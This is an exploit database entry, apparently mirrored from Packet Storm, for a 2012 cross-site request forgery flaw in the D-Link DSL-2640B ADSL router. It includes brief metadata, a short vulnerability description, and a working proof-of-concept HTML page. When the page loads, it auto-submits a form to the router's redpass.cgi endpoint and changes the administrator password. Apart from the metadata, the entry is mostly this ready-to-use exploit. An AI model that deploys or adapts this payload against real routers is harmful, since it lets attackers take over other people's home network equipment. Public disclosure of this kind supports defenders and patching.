ID
VAR-E-201202-0098
TITLE
D-Link DSL-2640B Cross Site Request Forgery
Trust: 0.5
DESCRIPTION
The D-Link DSL-2640B ADSL router suffers from a cross site request forgery vulnerability.
Trust: 0.5
AFFECTED PRODUCTS
vendor: | d link | model: | dsl-2640b | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : D-Link DSL-2640B (ADSL Router) CSRF Vulnerability
# Date : 19-02-2012
# Author : Ivano Binetti (http://ivanobinetti.com)
# Vendor site : http://www.d-link.com
# Version : DSL-2640B
# Tested on : Firmware Version: EU_4.00; Hardware Version: B2
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[Change Admin Account Password by Ivano Binetti]--------------------------------------------------+
Summary
1)Introduction
2)Vulnerability Description
3)Exploit
+---------------------------------------------------------------------------------------------------------------------------------+
1)Introduction
D-Link DSL-2640B is an ADSL Router using (also) a web management interface.
2)Vulnerability Description
The D-Link DSL-2640B's web interface (listening on tcp/ip port 80) is prone to CSRF vulnerabilities which allows to change router
parameters and -among other things- to change default administrator("admin") password.
3)Exploit
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change ADMIN password</H2>
<form method="POST" name="form0" action="http://192.168.1.1:80/redpass.cgi?sysPassword=new_password&change=1">
</form>
</body>
</html>
+----------------------------------------------------------------------------------------------------------------------------------+
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
csrf
Trust: 0.5
TAGS
tag: | exploit | Trust: 0.5 |
tag: | csrf | Trust: 0.5 |
CREDITS
Ivano Binetti
Trust: 0.5
EXTERNAL IDS
db: | PACKETSTORM | id: | 109979 | Trust: 0.5 |
SOURCES
db: | PACKETSTORM | id: | 109979 |
LAST UPDATE DATE
2022-07-27T09:27:46.852000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 109979 | date: | 2012-02-19T17:12:22 |